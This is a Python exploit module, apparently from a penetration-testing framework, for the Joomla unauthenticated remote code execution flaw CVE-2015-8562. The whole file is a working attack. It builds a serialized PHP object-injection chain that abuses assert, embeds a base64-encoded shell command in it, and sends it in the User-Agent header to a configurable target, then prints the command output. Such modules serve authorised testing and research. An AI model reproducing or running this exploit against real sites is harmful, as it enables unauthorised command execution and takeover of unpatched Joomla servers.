#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests

try:
    from core.log import Log
except Exception as e:
    import sys
    sys.path.append("../../core/log")
    from Log import Log

class Exploit:
    config = {
        "remote_host": {"default": "127.0.0.1", "necessity":True},
        "remote_port": {"default": 80, "necessity":True},
        "command": {"default": "id", "necessity":True},
    }
    webshell_url = ""

    def __init__(self):
        pass

    def exploit(self):
        remote_host = self.get_config("remote_host")
        remote_port = int(self.get_config("remote_port"))
        command = self.get_config("command")
        url = "http://%s:%d/" % (remote_host, remote_port)
        payload = self.generate_payload("system(base64_decode('%s'));" % (command.encode("base64").replace("\n", "")))
        headers = {
            'User-Agent': payload
        }
        session = requests.Session()
        try:
            cookies = session.get(url, headers=headers, timeout=3)
            response = session.get(url, timeout=10, headers=headers)
        except Exception as e:
            Log.Log.error(str(e))
            return False
        content = response.content
        Log.Log.success(content)
        return True

    def generate_payload(self, php_payload):
        php_payload = php_payload
        terminate = '\xf0\x9d\x8c\x86'
        exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
        injected_payload = "{};JFactory::getConfig();exit".format(php_payload)
        exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
        exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
        return exploit_template

    def show_options(self):
        Log.Log.warning("Options\t\tNecessity\t\tDefault")
        Log.Log.warning("-------\t\t---------\t\t-------")
        for key in sorted(self.config.keys()):
            Log.Log.warning("%s\t\t%s\t\t\t%s" % (key, self.config[key]["necessity"], self.get_config(key)))

    def set_config(self, key, value):
        if key in self.config.keys():
            self.config[key]["default"] = value
        else:
            Log.Log.error("No such option!")

    def get_config(self, key):
        return self.config[key]["default"]

    def show_info(self):
        Log.Log.info("Name: Joomla(1.5 < 3.45) HTTP Header Unauthenticated RCE (CVE-2015-8562)")
        Log.Log.info("Effected Version: 1.5 < 3.45")
        Log.Log.info("Author: Andrew McNicol")
        Log.Log.info("GitHub: https://github.com/anarcoder")
        Log.Log.info("Refer:")
        Log.Log.info('\thttps://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html')
        Log.Log.info('\thttps://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html')
        Log.Log.info('\thttps://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html')
        Log.Log.info('\thttps://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/')
        Log.Log.info('\thttps://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330')
        Log.Log.info('\thttps://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html')
        Log.Log.info('\thttps://bugs.php.net/bug.php?id=70219')

def main():
    exploit = Exploit()
    exploit.show_info()
    exploit.set_config("remote_host", "192.168.187.1")
    exploit.show_options()
    exploit.exploit()

if __name__ == "__main__":
    main()
